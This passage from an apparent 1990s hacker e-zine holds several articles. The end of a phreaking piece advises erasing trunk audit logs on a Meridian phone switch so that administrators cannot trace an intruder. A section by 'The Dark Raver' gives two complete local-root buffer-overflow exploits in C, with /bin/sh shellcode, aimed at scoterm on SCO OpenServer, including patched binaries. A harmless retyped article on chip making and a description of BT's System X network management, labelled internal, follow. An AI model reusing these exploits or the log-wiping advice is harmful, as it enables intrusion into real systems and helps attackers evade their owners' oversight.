  3824. Thats just a few ideas. But before you do ANYTHING, you should be aware that
  3825. anything you do could have devestating impact on the companys phone switch.
  3826. For example, say you accidently commanded the system to shut down.. You would
  3827. effectivly be killing 6000+ peoples phone lines, which would yield colosal
  3828. financial burden/loss onto the company. Generaly I'm just saying, be nice..
  3829. Just because you have the power to do such things, it doesnt mean you have to
  3830. do it. :)
  3831.  
  3832. A final note: In the aftermath of obtaining access to a merdian switch, it is
  3833. generaly advisable to erase all trace of you ever being on there. This can
  3834. be achived by reseting trunk audit logs, and erasing any log of your incoming
  3835. trunk setups. Therefore, if the real admin decided to track what was going on
  3836. he/she would get nowhere because the lines you used to initially call into
  3837. the system DO NOT EXIST. Its just a case of using your imagination. Don't be
  3838. destructive, Don't alter anything that would be noticed, Generally don't be
  3839. a f00l.. Thats the end of this file, I hope you enjoed it. Take it easy.
  3840.  
  3841. Shouts to D4RKCYDE, NOU!, b4b0, 9x, subz, pbxphreak, lusta, gr1p, LINEMANPUNX.
  3842.  
  3843.  
  3844.     .    ..  ... .......... BL4CKM1LK teleph0nics .......... ...  ..    .
  3845.     .    ..  ... .......... http://hybrid.dtmf.org ......... ...  ..    .
  3846.  
  3847. .
  3848. :
  3849. |
  3850. +-+[ SCO buffer overflow lameness ]+---> by darkraver <----------------------+
  3851. +-+[ D4RKCYDE                     ]+--->              <----------------------+
  3852.                                                                              |
  3853.                                                                              :
  3854.                                                                              .
  3855. SCO patches lameness
  3856. --------------------
  3857. The Dark Raver
  3858.  
  3859.  
  3860. I installed a good SCO OpenServer 5.0.4 on my box some months ago and spent
  3861. some time playing with it and coding some exploits. Some of my friends have
  3862. been testing these exploits on other machines and surprisingly some of them
  3863. had told me that some of the bugs exploited were still present in the
  3864. patched binaries of SCO.
  3865.  
  3866. I knew that Sun and SGI had shipped some patches that didn't work correctly
  3867. but I couldn't imagine SCO doing the same thing.
  3868.  
  3869. For example, the old well known scoterm bug:
  3870.  
  3871. -------------------------------------------------
  3872. $ /usr/bin/X11/scoterm.old -display `a 10000`
  3873. Error: Can't open display: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  3874.  
  3875. $ /usr/bin/X11/scoterm.old -geometry `a 10000`
  3876. Segmentation Fault (core dumped)
  3877.  
  3878. $ /usr/bin/X11/scoterm.old -fg `a 10000`
  3879. Segmentation Fault (core dumped)
  3880.  
  3881. $ /usr/bin/X11/scoterm.old -bg `a 10000`
  3882. Segmentation Fault (core dumped)
  3883. -------------------------------------------------
  3884.  
  3885. A lot of overflows...
  3886.  
  3887. And one of my first exploits, exploiting the -geometry overflow:
  3888.  
  3889. -------------------------------------------------
  3890. /*
  3891.  * <scotermx.c> Local root exploit 
  3892.  *
  3893.  * Offset: scoterm (SCO OpenServer 5.0.4)
  3894.  * 0 -> From an open scoterm (without display parameter)
  3895.  * 2500 -> From remote telnet (with display parameter)
  3896.  *
  3897.  * Usage: 
  3898.  * $ cc scotermx.c -o scotermx
  3899.  * $ scoterm 
  3900.  * $ /usr/bin/X11/scoterm -geometry `scotermx 0`
  3901.  *             or
  3902.  * $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `scotermx 2500`
  3903.  *
  3904.  * Note: scoterm need to be run from a valid x-display
  3905.  *
  3906.  * By: The Dark Raver of CPNE (Murcia/Spain - 21/6/99) 
  3907.  *
  3908.  * <http://members.tripod.com/~ochodedos> - <doble@iname.com>
  3909.  *
  3910.  */ 
  3911.  
  3912.  
  3913. #include <stdlib.h>
  3914. #include <stdio.h>
  3915.  
  3916.  
  3917. char hell[]=
  3918. "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
  3919. "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
  3920. "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
  3921.  
  3922. /*
  3923. char hell[]=
  3924. "\xeb\x1b" // start: jmp uno 
  3925. "\x5e" // dos: popl %esi
  3926. "\x31\xdb" // xorl %ebx,%ebx
  3927. "\x89\x5e\x07" // movb %bl,0x7(%esi)
  3928. "\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
  3929. "\x88\x5e\x11" // movb %bl,0x11(%esi)
  3930. "\x31\xc0" // xorl %eax,%eax
  3931. "\xb0\x3b" // movb $0x3b,%al
  3932. "\x8d\x7e\x07" // leal 0x07(%esi),%edi
  3933. "\x89\xf9" // movl %edi,%ecx
  3934. "\x53" // pushl %ebx
  3935. "\x51" // pushl %ecx
  3936. "\x56" // pushl %esi
  3937. "\x56" // pushl %esi
  3938. "\xeb\x10" // jmp execve
  3939. "\xe8\xe0\xff\xff\xff" // uno: call dos
  3940. "/bin/sh"
  3941. "\xaa\xaa\xaa\xaa"
  3942. "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 
  3943. */
  3944.  
  3945.                        
  3946. #define OFF 0x80452ff     // SCO OpenServer 5.0.4
  3947. #define ALINEA 1
  3948. #define LEN 2000
  3949.                        
  3950.  
  3951. int main(int argc, char *argv[]) {
  3952.  
  3953. int offset=0;
  3954. char buf[LEN];
  3955. int i;
  3956.  
  3957. if(argc < 2) {
  3958.     printf("Usage: scotermx <offset>\n"); 
  3959.     exit(0); }
  3960. else {
  3961.     offset=atoi(argv[1]); }
  3962.  
  3963. memset(buf,0x90,LEN);
  3964. memcpy(buf+1000,hell,strlen(hell));
  3965. for(i=1100+ALINEA;i<LEN-4;i+=4)
  3966.     *(int *)&buf[i]=OFF+offset;
  3967.  
  3968. for(i=0;i<LEN;i++)
  3969.         putchar(buf[i]);
  3970.         
  3971. exit(0);        
  3972. }                                 
  3973. -------------------------------------------------
  3974.  
  3975. Now let see the patched binary from SCO:
  3976.  
  3977. -------------------------------------------------
  3978.         System Security Enhancement (SSE) 009b - 27th January 1998
  3979.  
  3980. Problem:
  3981.  
  3982.         A vulnerability in /usr/bin/X11/scoterm has been identified.
  3983.         There is a risk that exploit details for this vulnerability
  3984.         may be distributed.
  3985.  
  3986.         The enclosed patch should be applied as soon as possible.
  3987.  
  3988. Patch:
  3989.  
  3990.         A replacement /usr/bin/X11/scoterm binary is supplied for each
  3991.         of the following SCO operating systems:
  3992.  
  3993.         - SCO Open Desktop/Open Server Release 3.0
  3994.  
  3995. ----
  3996. NOTE: For SCO OpenServer Release 5, please obtain and install OSS473A.
  3997. ----
  3998.  
  3999.         Note that the following SCO operating systems are not vulnerable:
  4000.  
  4001.         - SCO CMW+ 3.0
  4002.         - SCO UnixWare 2.1
  4003.  
  4004. Installation:
  4005.  
  4006.         Perform the following steps logged in as root, in system
  4007.         maintenance mode (single user):
  4008.  
  4009.         1. Create a temporary directory, and copy SSE009 into it:
  4010.                 
  4011.                 # mkdir /tmp/sse009b
  4012.                 # cp sse009b.tar.Z /tmp/sse009b
  4013.  
  4014.         2. uncompress the tar file:
  4015.  
  4016.                 # cd /tmp/sse009b
  4017.                 # uncompress sse009b.tar.Z
  4018.  
  4019.         3. extract the files from the tar file:
  4020.  
  4021.                 # tar xvf sse009b.tar
  4022.  
  4023.         4. Replace your old /usr/bin/X11/scoterm with the appropriate
  4024.            new binary, and set the file permissions and privileges:
  4025.  
  4026.                 # cp scoterm.odt3 /usr/bin/X11/scoterm
  4027.                 # chown root /usr/bin/X11/scoterm
  4028.                 # chgrp bin /usr/bin/X11/scoterm
  4029.                 # chmod 4711 /usr/bin/X11/scoterm
  4030.  
  4031. Disclaimer:
  4032.  
  4033. SCO believes that this patch addresses the reported vulnerability.
  4034. However, in order that it be released as soon as possible, this patch
  4035. has not been fully tested or packaged to SCO's normal exacting
  4036. standards.  For that reason, this patch is not officially supported.
  4037. SCO intends to make an official supported and packaged fix available
  4038. in the near future.
  4039. -------------------------------------------------
  4040.  
  4041. Lets look for overflows:
  4042.  
  4043. -------------------------------------------------
  4044. $ /usr/bin/X11/scoterm -geometry `a 10000`
  4045. scoterm: unable to open language file '/usr/lib/X11/%L/sco/ScoTerm/LangIndex'.
  4046. scoterm: keyboard mapping files are unavailable.
  4047. scoterm: scancode mode being disabled.
  4048. Warning: Shell widget "popup_mainMenu" has an invalid geometry specification:
  4049. "aaaaaaaaaaaaaaa...aaaaa"
  4050. Segmentation Fault (core dumped)
  4051. -------------------------------------------------
  4052.  
  4053. Ooops! the overflows are still there.
  4054.  
  4055. Taking a look with the gdb in the -geometry overflow, we see that the only 
  4056. things that have changed are the size of the buffer (smaller) and the 
  4057. stack address.
  4058.  
  4059. Modifying the old exploit to work here was so simple:
  4060.  
  4061. -------------------------------------------------
  4062. /*
  4063.  * <st2.c> Local root exploit 
  4064.  *
  4065.  * Offset: /usr/bin/X11/scoterm => Work only against patched binaries,
  4066.  * for default binaries use the old exploit.
  4067.  * -2000 -> Started from scoterm or xterm on localhost
  4068.  * 0 -> Started from remote telnet (with valid display parameter)
  4069.  *
  4070.  * Usage: 
  4071.  * $ cc st2.c -o st2
  4072.  * $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `st2 0`
  4073.  *
  4074.  * By: The Dark Raver of CPNE (Spain - 5/8/99) 
  4075.  *
  4076.  * <http://members.tripod.com/~ochodedos> - <doble@iname.com>
  4077.  *
  4078.  */ 
  4079.  
  4080.  
  4081. #include <stdlib.h>
  4082. #include <stdio.h>
  4083.  
  4084.  
  4085. char hell[]=
  4086. "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
  4087. "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
  4088. "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
  4089.  
  4090. /*
  4091. char hell[]=
  4092. "\xeb\x1b" // start: jmp uno 
  4093. "\x5e" // dos: popl %esi
  4094. "\x31\xdb" // xorl %ebx,%ebx
  4095. "\x89\x5e\x07" // movb %bl,0x7(%esi)
  4096. "\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
  4097. "\x88\x5e\x11" // movb %bl,0x11(%esi)
  4098. "\x31\xc0" // xorl %eax,%eax
  4099. "\xb0\x3b" // movb $0x3b,%al
  4100. "\x8d\x7e\x07" // leal 0x07(%esi),%edi
  4101. "\x89\xf9" // movl %edi,%ecx
  4102. "\x53" // pushl %ebx
  4103. "\x51" // pushl %ecx
  4104. "\x56" // pushl %esi
  4105. "\x56" // pushl %esi
  4106. "\xeb\x10" // jmp execve
  4107. "\xe8\xe0\xff\xff\xff" // uno: call dos
  4108. "/bin/sh"
  4109. "\xaa\xaa\xaa\xaa"
  4110. "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 
  4111. */
  4112.  
  4113.                        
  4114. #define OFF 0x7fffeb80     // SCO OpenServer 5.0.4
  4115. #define ALINEA 2
  4116. #define LEN 1500
  4117.                        
  4118.  
  4119. int main(int argc, char *argv[]) {
  4120.  
  4121. int offset=0;
  4122. char buf[LEN];
  4123. int i;
  4124.  
  4125. if(argc < 2) {
  4126.     printf("Usage: st2 <offset>\n"); 
  4127.     exit(0); }
  4128. else {
  4129.     offset=atoi(argv[1]); }
  4130.  
  4131. memset(buf,0x90,LEN);
  4132. memcpy(buf+600,hell,strlen(hell));
  4133. for(i=700+ALINEA;i<LEN-4;i+=4)
  4134.     *(int *)&buf[i]=OFF+offset;
  4135.  
  4136. for(i=0;i<LEN;i++)
  4137.         putchar(buf[i]);
  4138.         
  4139. exit(0);        
  4140. }                                 
  4141. -------------------------------------------------
  4142.  
  4143. This isn't the only patch that doesn't fix all vulnerabilities. Patch 024b
  4144. fixed bugs on the Xsco x-window server, but didn't fix the most dangerous
  4145. one: a buffer overflow that let you became root
  4146.  
  4147. Lets wait for the SCO guys to rewrite these patches soon...
  4148.  
  4149. The Dark Raver
  4150.  
  4151. .
  4152. :
  4153. |
  4154. +-+[ making chipz part I ]+---> by hitman <----------------------------------+
  4155. +-+[ D4RKCYDE            ]+--->           <----------------------------------+
  4156.                                                                              |
  4157.                                                                              :
  4158.                                                                              .
  4159. [Making A Computer Chip Part A]
  4160. >>>>>>>>>>>>h1tman<<<<<<<<<<<<<
  4161.  
  4162. /*  I did not write this article,my comp science teacher gave it to  */
  4163. /* me and i am merely typing it up for informational purposes only   */                                 
  4164.  
  4165. A computer chip is made by building layers of electronic pathways and
  4166. connections using conducting and non-conducting materials on a surface of
  4167. silicon. The combination of these materials into specific patterns forms
  4168. microscopic electronic components such as transistors, diodes, resistors, and
  4169. capacitors; the basic building blocks of electronic circuits. Connected
  4170. together on a chip,these components are referred to as an integrated circuit.
  4171. The application of the conducting and non-conducting materials to the silicon
  4172. base is done through a series of technically sophisticated chemical and
  4173. photographic processes. Some of the manufacturing steps are shown in the
  4174. following paragraphs.
  4175.  
  4176. A computer chip begins with a design developed by engineers usings a
  4177. computer aided circuit design program. In order to better view the design,
  4178. greatly enlarged printouts are prepared. Some chips only take a month or two
  4179. to design while others may take a year or more. A seperate design is required
  4180. for each layer of the chip. Most chips have at least four to six layers but
  4181. some have up to fifteen.
  4182.  
  4183. Although other materials can be used, the most common raw materials
  4184. used to make chips is silicon crystals that have been refined from quartz
  4185. rocks. The silicon crystals are melted and formed int a cylinder five to ten
  4186. inches in diameer and several feet long. After being smoothed, the silicon
  4187. ingot is sliced into wafers four to eight inches in diameter and 4/1000 of an
  4188. inch thick.
  4189.  
  4190. Much of the chip manufacturing is performed in special laboratories
  4191. called clean rooms. Because even the smallest particle of dust can ruin a
  4192. chip,the cleans rooms are kept 1000 times cleaner that a hospital operating
  4193. room. People who work in these facilites must wear special protective
  4194. clothing called bunny suits. Before entering the manufacturing area, the
  4195. workers removed any dust on their suits in an air shower.
  4196.  
  4197. After the wafer has been polished and sterilized, it is cleaned in a
  4198. chemical bath. Because the chemicals used in the cleaning process are
  4199. dangerous, this step is usually performed by a robot. After cleaning, the
  4200. wafers are placed in a diffusion oven where the first layer of material is
  4201. added to the wafer surface. Other materials, called dopants, are added to the
  4202. surface of the wafer in a proces called ion implantation. The dopants create
  4203. areas that will conduct electricity. Channels in these layers of materials
  4204. are removed in a process called etching. Before etching, a soft gelatin-like
  4205. emulsion called photoresist is added to the wafer. During photolithography,
  4206. an image of the chip design, called a mask, is used as a negative. The
  4207. photoresist is exposed to the mask using ultraviolet light. Ultraviolet light
  4208. is used because its short wavelength can reproduce very small details on the
  4209. wafer. Up to 100 images of the chip design are exposed on a single wafer. The
  4210. photresist exposed to the ultraviolet light becomes hard and the photoresist
  4211. covered by the chip design on the mask remains soft. The soft photoresist and
  4212. some of the surface materials are etched away with hot gases leavinig what
  4213. will become circuit pathways. The process of adding material and photoresist
  4214. to the wafer,exposing it to ultraviolet light, and etching away the unexposed
  4215. surface, is repeated using a different mask for each layer of the circuit.
  4216.  
  4217. After all circuit layers have been added, individual chips on the wafer are
  4218. tested by a machine that uses probes to apply electrical current to the chip
  4219. circuits. In a process called dicing, the wafers are cut with a diamond saw
  4220. into individual chips called die. Die that have passed all tests are placed
  4221. in a ceramic or platic case called a package. Circuits on the chip are conned
  4222. to pins on the package using gold wires. Gold is used because it conducts
  4223. electrcity well and does not corrode. The pins connect the chip to a socket
  4224. on a circuit board.
  4225.  
  4226. Continued in Part B...
  4227.  
  4228. .
  4229. :
  4230. |
  4231. +-+[ System X network administration ]+---> by hybrid       <----------------+
  4232. +-+[ D4RKCYDE                        ]+---> hybrid@dtmf.org <----------------+
  4233.                                                                              |
  4234.                                                                              :
  4235.                                                                              .
  4236.  
  4237.          _\|/_    [ GBH ]     Gwahn Burnin Haxorz     [ GBH ]   _\|/_
  4238.  
  4239.  
  4240. BT Network Administation Support System Development
  4241. SYSTEM X and OMC network operations..
  4242. BT PhoneBone tekniq By hybrid <hybrid@dtmf.org>
  4243. NOT TO BE SHOWN OUTSIDE BT. GBH internal awarez.           [  _\|/_  ]
  4244.                                                            |   GBH   |
  4245.                                                            :         :
  4246.                                                            .         .
  4247.  
  4248. PART I (Introduction to BT managment on the PSTN)
  4249.  
  4250. Introduction
  4251.  
  4252. The technology within the network has advanced through digitalisation of
  4253. both transmission and switching, and the introduction of computer contolled
  4254. network elements. The greater reliability of this technology and the ability
  4255. to manage and configure the elements remotely has created new opportunities
  4256. for efficiant managment of the network.
  4257.  
  4258. These opotunitys have been translated into a vision for the future operation
  4259. and managment of the network, initially through the Network Administration
  4260. Task Force (NATF) and subseqent refinements in terms of architecture (Network
  4261. Managment Architecture), and process (Strategic Systems Plan (SSP)).
  4262.  
  4263. THE VISI0N
  4264.  
  4265. The vision can be summerised as:
  4266.  
  4267. -+ end-to-end network managment
  4268. -+ functioncal coverage of the whole network life cycle
  4269. -+ fully integrated functionality
  4270. -+ high levels of automation/decision support
  4271. -+ conformant to architectual objectives:
  4272.         a) network managment hierarchy
  4273.         b) co-operative network architecture
  4274.         c) open systems platform
  4275.  
  4276. End-to-End managment
  4277.  
  4278. It is essential to be able to manage networks made up of elements from
  4279. different vendors and different generations of equipment in a consistant
  4280. manner, so that the network can be viewed as a complete entity which provides
  4281. a managed service platform.
  4282.  
  4283. Whole Life Cycle
  4284.  
  4285. Networks and services must be managhed from 'cradle to grave' (figure 1),
  4286. covering:
  4287.  
  4288. -+ forecasting
  4289. -+ requirments analysis
  4290. -+ detailed dimensioning and project planning
  4291. -+ data building
  4292. -+ installation and commisioning
  4293. -+ maintenance/billing/traffic managment
  4294. -+ repair
  4295. -+ performance
  4296. -+ enhancment/withdrawal
  4297.  
  4298.  
  4299.              future service          |             pre-service
  4300.                                      |
  4301.                                      |
  4302.              requirments             |             data building
  4303.                                      O
  4304.              forceasting           /   \           installing
  4305.                                  /       \
  4306.              performance       /           \       commissioning
  4307.                              /\              \/
  4308.                            /                   \
  4309.      FIGURE 1            /                       \        NETWORK AND
  4310.                        /                           \      SERVICE LIFE
  4311.                      O---------------<---------------O    CYCLE
  4312.                    /                                   \
  4313.                  /                                       \
  4314.                /   statistics    billing    maintenance    \
  4315.  
  4316.                    traffic managment        repair
  4317.  
  4318.  
  4319. Hands free operation
  4320.  
  4321. It is essensial to give network managers a high level of automation in order
  4322. to eneable them to cope with the levels of complexity involved, vast amounts
  4323. of data, apparently random nature of problems, and the need for speed,
  4324. accuracy and consistancy in decision making. This requires:
  4325.  
  4326. -+ incidents to be analyised automatically with the manager's concurance
  4327.    being sought to the solution offered;
  4328.  
  4329. -+ automatic restoration of service to be achived whenever possible;
  4330.  
  4331. -+ jobs depached to the workforce based on an optimum approach to jeopardy,
  4332.    costs, tactics and company image.
  4333.  
  4334. -+ customers notification of service affected generated automaticaly to the
  4335.    approproate customer-facing unit; and
  4336.  
  4337. -+ performanace statistics kept and analysed on all key proccesses.
  4338.  
  4339.  
  4340. Development challenges
  4341.  
  4342. The challenge for the system developers is to be responsive and meet new
  4343. requirments quickly, while producing enduring systems which fit within an
  4344. integrated set-the jigsaw-- the whole evolving towards the Network
  4345. Administration Implementation Program (NAIP) and SSP vision in a cost
  4346. effective manner.
  4347.  
  4348. The developers have to move from a possision of well over 200 systems, most
  4349. of which do not interwork, and many of which no longer offer all the
  4350. essensial fucnctions, to a set of around 40 fully integrated high
  4351. functionality key systems.
  4352.  
  4353. Functions must be brought into line with the required buisness proccesses and
  4354. must evolve to match the demands of new network technologys, for instance,
  4355. planning rules for fibre systems must be continually reviwed to encompass
  4356. increasing capacities and repeaterless operation.
  4357.  
  4358. Systems must also take account of the changing operational organaisations
  4359. and procedures, framework which can evolve without damaging the software
  4360. investment already made. Solutions have to be achived within four planes of
  4361. change as illustrated in figure 2.
  4362.  
  4363.  
  4364.                -+ linked planes of change
  4365.  
  4366.  +--------+    +------------------------------------------+
  4367.  |        |    |                                          | -+ people
  4368.  |        |    |                                          | -+ groups/duties
  4369.  |   N    O-><-O--                                        | -+ skillz
  4370.  |        |    |   USER ORGANISATION                      | -+ procedures
  4371.  |   E    |    +-------------------o----------------------+
  4372.  |        |                        |
  4373.  |   T    |    +-------------------|----------------------+
  4374.  |        |    |                   |                      | -+ maintainence
  4375.  |   W    |    |                   :                      | -+ planning
  4376.  |        O-><-O--                                        | -+ repair control
  4377.  |   0    |    |   NETWORK MANAGMENT FUNCTIONS            | -+ traffic/control
  4378.  |        |    +-------------------o----------------------+ -+ data building
  4379.  |   R    |                        |
  4380.  |        |    +-------------------|----------------------+
  4381.  |   K    |    |                   |                      | -+ computers
  4382.  |        |    |                   :                      | -+ terminals
  4383.  |        O-><-O--                                        | -+ database
  4384.  |        |    |   COMPUTING AND HOST ARCHITECTURE        | -+ etc.
  4385.  +--------+    +------------------------------------------+
  4386.  
  4387.  
  4388. PART II (Adminstration of BT Network layers) ohday.
  4389.  
  4390. -+ Interface Architecture
  4391.  
  4392. The interface architecture provides the means to link all the pieces of the
  4393. jigsaw together. By a mix of Open Systems Interconnection (OSI) products and
  4394. pragmatic proprietry products, (for example, SNA, DECNET), a communications
  4395. infastructure will be deployed to connect users to systems, systems to other
  4396. systems for information sharing, and systems to the network elements they are
  4397. managing. Key standards for these interfaces are being defined in the Co-
  4398. Operative Networking Architecture (CNA-M) prgramme.
  4399.  
  4400. -+ Data Architecture
  4401.  
  4402. Data architecture offers the ability to standardise what the processes need
  4403. to talk about. Defining the structure and format of the key information
  4404. items provides a common currency which may be shared by the complete family
  4405. of support systems. The object orientated style of the CNA-Managment
  4406. communications protocols will ofrce the standardisation of objects as well
  4407. as simple data structures in the CNA-M programme and external standards
  4408. bodies like ISO, CCITT and the OSI Network Managment Forum.
  4409.  
  4410. -+ System (Computing) Architecture
  4411.  
  4412. The system architecture defines how a particular system is constructed,
  4413. rather than the fucntional role it plays within the jigsaw. This deals with
  4414. the following main conponments.
  4415.  
  4416. -+ computer hardware
  4417. -+ operating system
  4418. -+ database managment system
  4419. -+ transaction proccessing
  4420. -+ communications drivers
  4421. -+ man -- machine interfacing (MMI), and
  4422. -+ application programming interface (API).
  4423.  
  4424. There is a drive by the computing industry to create standard open interfaces
  4425. to these elements, based on UNIX/POSIX and X Open standards to produce the
  4426. open platform. The system developers are also driving towards reusable sub-
  4427. functions and utilities. These two initiiatives are being bought together
  4428. in the Generic Systems Architecture (GSA).
  4429.  
  4430. -+ Integration and evolution
  4431.  
  4432. SSP, ONA-M, Generic Systems Architecture and the Network Control Architecture
  4433. Board (NCAB) 5 year vision for support systems evolution have all
  4434. contibuted to creating a clear picture of how support systems will look in
  4435. the future. It is important, however, that a very pragmatic approach is taken
  4436. to realising this vision.
  4437.  
  4438. -+ SWITCH MANAGMENT
  4439.  
  4440. BT switch managment is carried out by the OMC (Operations Maintanace
  4441. Center) for local exchanges and the operations and maintanance unit support
  4442. system (OMUSS) (an OMC derivative) for trunk exchanges. This system has
  4443. clocked up over 3000 system months of reliable service sinse its introduction
  4444. n 1984. As the first majour network managment system, it has paved the way
  4445. for the NACC/NOU structure.
  4446.  
  4447.  
  4448.  
  4449.  +-------------+                     +---------+              +-----------+
  4450.  |             |<-----------------.  |  NMW2   |              |           |
  4451.  |  CSS        |<---------.       |  +---------+              |   DCSS    |
  4452.  +-------------+          |       :                           |           |
  4453.                           |    +--:-------------+             +-----------+
  4454.                           |    |                |
  4455.                           |    |     NOMS 2     |-------------------.
  4456.                           :    |                |                   |
  4457.                           :    +-/--------/--|--+             +-----:-----+
  4458.                .- - - - - : - -/- -.    /    |                |           |
  4459.                |          :  /     |  /      |                |   NOMS 1  |
  4460.                :/         :/       :/        :                |           |
  4461.            +------+  +---/--+  +--/---+  +---:--+             +-----------+
  4462.            |      |  |      |  |      |  |      |               | | | |
  4463.            | FAS  |  | OMC  |  | TMS  |  | OMUSS|               : : : :
  4464.            +------+  +------+  +------+  +------+               ALARMS
  4465.                :\        :\        :\        :\
  4466.                |         |         |         |
  4467.                |         :         |         :
  4468.                |    .----------.   |     .----------.         .----------.
  4469.  .--------.    |    |          |   |     |          |         |          |
  4470.  |        |    :    |          |   :     |          |         | INTER-   |
  4471.  | HOUSE  O=========O  LOCAL   O=========O  TRUNK   O=========O NATIONAL O===
  4472.  |________|         |          |         |          |         |          |
  4473.                     |____:_____|         |____:_____|         |__________|
  4474.                          :      \       /     :  ______
  4475.                          :        \   /       : |      |
  4476.                          :          x         : |______|
  4477.                          :        /   \       :
  4478.                     .----:-----./       \.----:-----.         
  4479.                     |          |         |          |         
  4480.                     |          |         |          |         
  4481.                     |   DDC    |-------->|   DESS   |
  4482.                     |          |         |          |         
  4483.                     |__________|         |__________|         
  4484.  
  4485.  
  4486. -+ CSS   :      Customer Service System
  4487. -+ NMW2  :      Network Managment Workstation
  4488. -+ DCSS  :      District Control Support System
  4489. -+ NOMS  :      Network Operations Managment System
  4490. -+ FAS   :      Fibre Access System
  4491. -+ OMC   :      Operations and Maintanance Center
  4492. -+ TMS   :      Transmission Monitoring System
  4493. -+ DDC   :      District Data Collector
  4494. -+ DESS  :      Digital Exchange Support System
  4495. -+ OMUSS :      Operations and Maintenance Unit Support System
  4496.  
  4497.  
  4498. There are over 60 systems in field serivce, with over 10,000 registered
  4499. users, covering all trunk and local System X and AXE switches. Enhancment
  4500. continues to run at a considerable pace, working its way into the field
  4501. through two major realeses per year.
  4502.  
  4503.  
  4504.         +------------+           +--------+             +------------+
  4505.         | EXCHANGE A |<----------|        |<------------| EXCHANGE Z |
  4506.         |            |---------->|        |------------>|            |
  4507.         +------|-----+           +----|---+     ^       +------|-----+
  4508.                |                      |         |              |
  4509.  ==============|======================|=========|==============|=============
  4510.                :                      :         :              :
  4511.         +------:-----+      +---------:---------:---+
  4512.         | ALARMS HAN |      |                       |      +---
  4513.         | DELING SYS |<-----|         O M S         |----->|  O-O
  4514.         +------:-----+      |                       |      +---
  4515.                :            |                       |
  4516.                |            |                       |      +---
  4517.                |            |  SRS            LECS  |----->|  |_\
  4518.                |            |                       |      +---
  4519.           +----:----+       |                       |
  4520.           |TERMINAL |       | USER FACLITYS/DUTIES  |      +---
  4521.           |DISPLAY  |       | DEC VAX H/W           |----->|  (  )
  4522.           +---------+       +-----:---:---:---:-----+      +---
  4523.                                   |   |   |   |
  4524.                                   |   |   |   |
  4525.    A) ADMINISTRATION USERS       /   /     \   \    
  4526.    B) MAINTANENCE USERS         |   |       |   |
  4527.    C) REMOTE USERS              ^   ^       ^   ^
  4528.    D) OTHER SYSTEMS             A   B       C   D
  4529.  
  4530.  
  4531. -+ OMS  :    Operational Maintanence System
  4532. -+ SRS  :    Subscribers Record System
  4533. -+ LECS :    Local Equipment Computer System
  4534.  
  4535.  
  4536. The system is based on a VAX/VMS platform with Oracle relational database,
  4537. its pwn basic forms/menus man --machine interface and X.25/V.24
  4538. communications drivers. The Exchange interfaces are conrolled through
  4539. flexable data-driven translators and the basic structure of the system is
  4540. highly modular. The priority evolution steps for OMC are:
  4541.  
  4542. -+ interoperability with CSS, the transmission network survailance (TNS)
  4543.    system and workforce managment (NOMS2)
  4544. -+ additional exchange interfaces for advanced services unit (ASU) etc.,
  4545. -+ adoption of advanced workstation (NMW2) man --machine interfacing
  4546. -+ donation of functions to Generic Event Managment (GEMS).
  4547.  
  4548.  
  4549. -+ Transmission Managment
  4550.  
  4551. The transmission monitoring system (TMS) provides a comprehensive survailence
  4552. system for the transmission aspects of the network. While the OMC manages a
  4553. smaller set of complex network elements, the TMS faces the challenge of
  4554. collecting, collating and displaying information from a vast array of
  4555. physically dispersed conponments. After field-trial stages and recent
  4556. product trials in London, the TMS is now being rolled out into the three
  4557. pilot NOU catchment areas. The major TNS functions are:
  4558.  
  4559. -+ alarm reception, display, filing, retrival and archiving
  4560. -+ alarm association and comparason;
  4561. -+ performance data proccessing and display
  4562. -+ access to other systems (for example, the junction network system (JNS)
  4563.    database)).
  4564.  
  4565.  
  4566. -+ Local Access Managment
  4567.  
  4568. The flexible access system (FAS) is a system which has been developed to
  4569. manage fibre in the local loop. Systems have been installed for the City
  4570. Fibre Network and Docklands. The support system, the service access control
  4571. center (SACC), once more shares a common lineage and technology platform with
  4572. OMC combined with the ICENI database produced by NMD, and used as an
  4573. element in the service desk and facilies managment systems. FAS was the first
  4574. system to attempt to adopt the network managment hierarchy, with well
  4575. defined interfaces between the service access control center (SACC) (network
  4576. level controller) and element managers developed by equipment supplyers. It
  4577. also adopted the network managment workstation (NMW1) to remove a multitude
  4578. of various terminals.
  4579.  
  4580. Until the future of the FAS is fully determined, the SACC will not be
  4581. enhanced and evolved. However, the structure of future advanced local access
  4582. managment is being considered based on experience of FAS, LLOFT (the local
  4583. loop optical fibre trial) and cable TV managment.
  4584.  
  4585.  
  4586. -+ Data managment and performance analysis
  4587.  
  4588. The digital exchange support system (DESS) consists of many applications
  4589. which are grouped together under a single code name. Some of the functions
  4590. these appications perform are:
  4591.  
  4592. -+ data build for new exchanges and major upgrades
  4593. -+ generic network performance statistics by analysiing the large volume of
  4594.    data generated bt switches
  4595. -+ providing national reference source for charging information, and
  4596.    associated validation tools to ensure charging integrety
  4597. -+ provding a database and tracking mechanism for all exchange insident
  4598.    reports; and
  4599. -+ a register of the hardware and software build levels for all exchanges in
  4600.    the network.
  4601.  
  4602. DESS is a major system which runs on the largest VAX cluster configurations
  4603. in the world. It supports a population of 2000 users, 140 of which may be
  4604. similtaniously logged into the system. A typical daily workload for DESS
  4605. would be analysing 1-4 Gigs of exchange generated data, producing 35
  4606. thousand pages of printout, and writing or reading 1500 exchange cartridges.
  4607.  
  4608. COMMING SOON... NOMS INTERNAL NETWORKING OPER4TIONS.
  4609.  
  4610. .
  4611. .
